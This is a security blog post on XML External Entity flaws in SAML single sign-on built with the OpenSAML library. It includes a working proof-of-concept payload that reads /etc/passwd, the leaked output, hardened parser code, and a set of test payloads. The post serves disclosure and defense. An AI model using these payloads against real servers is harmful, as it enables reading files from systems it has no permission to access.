Web-based Single Sign-On and the Dangers of SAML XML Parsing

Security Assertion Markup Language (SAML) is a popular XML-based open standard for exchanging authentication and authorization data between two systems. In the world of enterprise cloud applications, SAML is one of the most common protocols for implementing single sign-on between enterprise customers and cloud service providers. Given that, it’s no surprise that support for SAML-based single sign-on was one of the earliest features our enterprise customers requested.

A typical web-based single sign-on transaction (or web SSO for short) involves three parties: the service provider, the identity provider, and a user agent (the user). In our world, we (SendSafely) are the service provider, our enterprise customers are the identity provider, and our end users are the user agent. At a high level, the sign-on transaction looks something like the following diagram:

As you can see, while the exchange is not overly complex, there are several steps in which XML-based messages are handled by the identity provider and the service provider. One thing we noticed right away when planning to implement the service provider end of the workflow was that publicly available documentation for building a custom implementation is scarce. There is no shortage of third-party solutions, but at SendSafely we are always hesitant to add unnecessary external dependencies to our code base because of the vulnerabilities they could introduce into our platform. This hesitation is especially strong when it comes to anything authentication related. Rather than go with an off-the-shelf solution, we opted to use the OpenSAML library and implement the service provider ourselves so that we know what is happening under the hood.

OpenSAML Sample Code

Having decided to go with OpenSAML, the first thing we did was consult the official website to obtain the latest version of the library and review the available documentation. As with most well-documented platforms, the documentation included some basic code examples showing how to use the library to consume and generate SAML.

To accept and process SAML responses from our customers, we essentially need to parse an XML message delivered by the user agent (sent by the identity provider) and validate the SAML contents. The following documentation and sample code are published on the OpenSAML website and show how to convert XML retrieved from the authentication response into the expected SAML object.
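Before any parsing happens, the XML has to be pulled out of the incoming request. The sketch below assumes the SAML HTTP POST binding, where the response arrives as a Base64-encoded form field named SAMLResponse; the post does not say which binding is used, and the class and method names are hypothetical.

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

// Hypothetical helper, not part of OpenSAML.
final class SamlResponseDecoder {

    /** Decodes the Base64 value of a SAMLResponse form field into raw XML text. */
    static String decode(String samlResponseParam) {
        // The MIME decoder tolerates line breaks that some senders insert into the value.
        byte[] xmlBytes = Base64.getMimeDecoder().decode(samlResponseParam);
        return new String(xmlBytes, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        String xml = "<samlp:Response xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\"/>";
        String encoded = Base64.getEncoder().encodeToString(xml.getBytes(StandardCharsets.UTF_8));
        System.out.println(decode(encoded));
    }
}
```

The decoded string is still untrusted input at this point; nothing about the encoding step validates it.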

https://wiki.shibboleth.net/confluence/display/OpenSAML/OSTwoUsrManJavaCreateFromXML

It’s worth pointing out that I wear two hats on most days: that of a developer and architect at SendSafely, and that of a professional penetration tester at Gotham Digital Science. One thing my pen testing experience has taught me is that any code responsible for parsing XML is a prime target for an XML External Entity (XXE) vulnerability. For those unfamiliar with XXE vulnerabilities, they often allow a malicious user to read arbitrary files and open arbitrary TCP connections from the vulnerable server, and they can also be used to launch Denial of Service attacks. In short, lots of bad stuff can happen. Unfortunately, the code example from the OpenSAML website just so happens to be vulnerable to this attack.

To confirm this, we whipped up the following test code and our suspicions were validated. The test code exploits the fact that external entity calls are allowed and will load the “/etc/passwd” file from the server and return its content to the malicious user. Houston, we have a problem.

Code:

try {
    // DOCTYPE that declares an external entity pointing at a local file
    String evilString = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>"
            + "<!DOCTYPE doc [ <!ENTITY x3 SYSTEM \"file:///etc/passwd\"> ] >";

    // AuthnRequest whose Issuer element references the external entity (&x3;)
    String XMLString = "<samlp:AuthnRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\""
            + " xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\""
            + " ID=\"aaf23196-1773-2113-474a-fe114412ab72\" Version=\"2.0\""
            + " IssueInstant=\"2004-12-05T09:21:59\""
            + " AssertionConsumerServiceIndex=\"0\" AttributeConsumingServiceIndex=\"0\">"
            + "<saml:Issuer>&x3;</saml:Issuer>"
            + "<samlp:NameIDPolicy AllowCreate=\"true\""
            + " Format=\"urn:oasis:names:tc:SAML:2.0:nameid-format:transient\"/>"
            + "</samlp:AuthnRequest>";
    XMLString = evilString + XMLString;

    DefaultBootstrap.bootstrap();

    // Get parser pool manager
    BasicParserPool ppMgr = new BasicParserPool();
    ppMgr.setNamespaceAware(true);

    // Parse the attacker-controlled XML
    InputStream in = new ByteArrayInputStream(XMLString.getBytes("UTF-8"));
    Document inCommonMDDoc = ppMgr.parse(in);
    Element metadataRoot = inCommonMDDoc.getDocumentElement();

    // Get appropriate unmarshaller
    UnmarshallerFactory unmarshallerFactory = Configuration.getUnmarshallerFactory();
    Unmarshaller unmarshaller = unmarshallerFactory.getUnmarshaller(metadataRoot);

    // Unmarshall using the document root element, an AuthnRequest in this case
    AuthnRequestImpl inCommonMD = (AuthnRequestImpl) unmarshaller.unmarshall(metadataRoot);

    // The Issuer value now holds the contents of /etc/passwd
    System.out.println("Winning: " + inCommonMD.getIssuer().getValue());
} catch (Exception e) {
    e.printStackTrace();
}

Output:

Winning: ##
# User Database
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false

The OpenSAML library leaves the XML parsing of SAML data to the developer before the result is passed to the “Unmarshaller” object. We consider that a bad design decision, and as you can see here, it leaves many custom SSO and other SAML-based solutions potentially susceptible to XXE. Unfortunately, we see this issue quite a bit at GDS, not only in SAML implementations but in any application that handles XML data from untrusted sources.
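Since the parsing step is the developer's responsibility, the parser configuration is where the defense has to live. The following is a minimal sketch using only the standard JAXP API, not OpenSAML's BasicParserPool; the class and method names are hypothetical, and the feature URIs are the ones recognized by the JDK's built-in parser. It refuses any document that carries a DOCTYPE, which removes the entity declaration the exploit depends on.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

// Hypothetical helper; assumes the JDK's default JAXP implementation.
final class HardenedXmlParser {

    /** Builds a factory that rejects DOCTYPE declarations and external entities. */
    static DocumentBuilderFactory newFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setNamespaceAware(true);
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Primary defense: fail as soon as a DOCTYPE is seen.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth in case the DOCTYPE ban is ever relaxed.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    static Document parse(String xml) throws Exception {
        byte[] bytes = xml.getBytes(StandardCharsets.UTF_8);
        return newFactory().newDocumentBuilder().parse(new ByteArrayInputStream(bytes));
    }

    /** Returns true when the parser refuses the document with a SAX error. */
    static boolean isRejected(String xml) {
        try {
            parse(xml);
            return false;
        } catch (SAXException e) {
            return true;
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        String evil = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
                + "<!DOCTYPE doc [ <!ENTITY x3 SYSTEM \"file:///etc/passwd\"> ]>"
                + "<doc>&x3;</doc>";
        System.out.println("evil document rejected: " + isRejected(evil));
    }
}
```

A legitimate SAML message has no need for a DOCTYPE, so banning it outright is usually an acceptable trade-off; the resulting root element can then be handed to the unmarshaller as before.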

We have notified the OpenSAML team about the vulnerable sample code and the XXE flaw in the BasicParserPool XML parsing logic that ships with the OpenSAML library. Developers and security professionals should be aware that this issue may exist across the internet in other open source solutions, off-the-shelf software, or even your organization's custom SAML parsing code.

Morals of the Story

One could say there are a couple of morals to this story. The most important is to never assume that sample code is good code. Yes, the code will likely do what it’s supposed to, but it may also do much more (and not the kind of thing you want it to do). You should always carefully review any sample code retrieved from the web, especially if it directly handles user input. The same can be said about any off-the-shelf or open source solution.

Another important takeaway is that SAML, at the end of the day, is simply XML data, so your threat model must include XML-specific risks like XXE, entity expansion attacks, and even potential injection flaws.
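One way to keep those risks from quietly returning is to turn them into a regression check. The sketch below is an assumption about how such a check could look, not something from our code base: it feeds a few hostile documents (an external entity, a nested entity expansion, and an external parameter entity) to a JAXP factory and reports any that the parser did not refuse. The payload names, the probe paths, and the class itself are hypothetical.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

// Hypothetical regression check; assumes the JDK's default JAXP implementation.
final class XmlThreatPayloadCheck {

    /** Hostile documents keyed by a short label. The file paths are placeholders. */
    static Map<String, String> payloads() {
        Map<String, String> p = new LinkedHashMap<>();
        p.put("external-entity",
                "<!DOCTYPE d [<!ENTITY x SYSTEM \"file:///nonexistent/xxe-probe\">]><d>&x;</d>");
        p.put("entity-expansion",
                "<!DOCTYPE d [<!ENTITY a \"aaaa\"><!ENTITY b \"&a;&a;&a;&a;\">]><d>&b;</d>");
        p.put("parameter-entity",
                "<!DOCTYPE d [<!ENTITY % p SYSTEM \"file:///nonexistent/xxe-probe.dtd\"> %p;]><d/>");
        return p;
    }

    /** Factory that refuses every document containing a DOCTYPE. */
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setNamespaceAware(true);
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return dbf;
    }

    /** Returns the labels of payloads the parser failed to refuse outright. */
    static List<String> acceptedPayloads(DocumentBuilderFactory dbf)
            throws ParserConfigurationException {
        List<String> accepted = new ArrayList<>();
        for (Map.Entry<String, String> e : payloads().entrySet()) {
            byte[] bytes = e.getValue().getBytes(StandardCharsets.UTF_8);
            try {
                dbf.newDocumentBuilder().parse(new ByteArrayInputStream(bytes));
                accepted.add(e.getKey()); // parsed cleanly: the parser allowed it
            } catch (SAXException refused) {
                // Parser refused the document, which is the desired outcome.
            } catch (IOException attemptedFetch) {
                accepted.add(e.getKey()); // parser tried to resolve the external resource
            }
        }
        return accepted;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("accepted by hardened parser: " + acceptedPayloads(hardenedFactory()));
    }
}
```

Running a check like this against whatever factory or parser pool the application actually uses gives an early warning if a configuration change or a library upgrade re-enables DOCTYPE processing.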